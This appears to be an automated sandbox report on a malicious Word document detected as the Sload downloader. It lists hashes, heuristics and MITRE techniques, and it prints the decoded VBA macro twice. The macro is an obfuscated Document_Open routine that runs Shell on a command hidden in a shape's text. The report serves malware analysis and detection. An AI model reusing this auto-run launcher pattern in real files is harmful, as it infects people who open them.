Office (OLE) malware analysis — malicious · 6bc0481d7b339a55

MALICIOUS

Office (OLE)

73.2 KB Created: 2018-11-07 07:04:00 Authoring application: Microsoft Office Word First seen: 2019-05-10

MD5: 219caadcf73f79ca789422b8825f932c SHA-1: 4ede7ec56c5c75d0cf84791932ca2f281b2600d2 SHA-256: 6bc0481d7b339a55f6493bfba40bca7819a3799a39b5beaf09490aafed45bc24

210 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro that executes an obfuscated PowerShell command. This command decodes and executes a second-stage payload, likely for downloading further malware. The presence of the 'Document_Open' macro and the suspicious command execution heuristics strongly indicate a malicious downloader.

Heuristics 7

ClamAV: Doc.Downloader.Sload-6743946-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sload-6743946-0
Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Reference to PowerShell high SC_STR_POWERSHELL

Reference to PowerShell
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1279 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1279 bytes
SHA-256: `65b6baadcd9ad16d259e8dbc603e22cf2ffa28b9f5423c3bebcfb562a2b25b8c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "FTtpLzfzDpkEjD" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next Error ZrJjTk + GjHJGc + vihch + qqYarY + jUhmY + qtlzqo * (DNdot + PLABi + XVziS + suUQmB) FormatNumber MaUVi + QlPhT / (qlqsQs + ttIHB + QZafUt + QKnwYp * (PhInFI + dWKlTz + taETS + ScpGun)) TimeValue (NlbKir + LudNjh) / JEjSDi + WtKSQ + uCnbbT + BikpW Error hdvow + tphap - rozVTT + WvVwc + nwkhi + cinTH - YnHlpB + DVdMQ - fAtXdM + TcJZIH + TMwDV + jvfMkF Error hojRZ + fYZMt / kLuORO + qLTjd + IPofAc + Gbpvz - (fjmOS + waziDJ + CWwzOF + iQKqt + (kjlJW + PGipEw)) TimeValue zuUbIw + lVBtJ / DPtBvm + kjcFG + nrBsS + uwYPRr Const qjroTntk = 261035486 - 261035486 Shell@ Shapes(JIjlVCZ + bbqtd + 1 + vUsEPo + EurUh).TextFrame.TextRange.Text + MLbZH + XXLwd, qjroTntk FormatNumber jdCZL + SiozwJ / (DkCwE + bzLKGz + hRAHm + tAkSWo + kTwOXP + jFptPC) TimeValue (KUTwat + BihLSP * (TRjIO + IBzmq + (lbcHr + hEpPzZ))) Error IVdTTI + JqPUSU + bKEGNY + fSEHr * wUsTKJ + wYNAN + (bDUMEp + ZwMGp) End Sub

SHA-256: 65b6baadcd9ad16d259e8dbc603e22cf2ffa28b9f5423c3bebcfb562a2b25b8c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "FTtpLzfzDpkEjD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   Error ZrJjTk + GjHJGc + vihch + qqYarY + jUhmY + qtlzqo * (DNdot + PLABi + XVziS + suUQmB)
   FormatNumber MaUVi + QlPhT / (qlqsQs + ttIHB + QZafUt + QKnwYp * (PhInFI + dWKlTz + taETS + ScpGun))
   TimeValue (NlbKir + LudNjh) / JEjSDi + WtKSQ + uCnbbT + BikpW
   Error hdvow + tphap - rozVTT + WvVwc + nwkhi + cinTH - YnHlpB + DVdMQ - fAtXdM + TcJZIH + TMwDV + jvfMkF
   Error hojRZ + fYZMt / kLuORO + qLTjd + IPofAc + Gbpvz - (fjmOS + waziDJ + CWwzOF + iQKqt + (kjlJW + PGipEw))
   TimeValue zuUbIw + lVBtJ / DPtBvm + kjcFG + nrBsS + uwYPRr
Const qjroTntk = 261035486 - 261035486
Shell@ Shapes(JIjlVCZ + bbqtd + 1 + vUsEPo + EurUh).TextFrame.TextRange.Text + MLbZH + XXLwd, qjroTntk
   FormatNumber jdCZL + SiozwJ / (DkCwE + bzLKGz + hRAHm + tAkSWo + kTwOXP + jFptPC)
   TimeValue (KUTwat + BihLSP * (TRjIO + IBzmq + (lbcHr + hEpPzZ)))
   Error IVdTTI + JqPUSU + bKEGNY + fSEHr * wUsTKJ + wYNAN + (bDUMEp + ZwMGp)
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.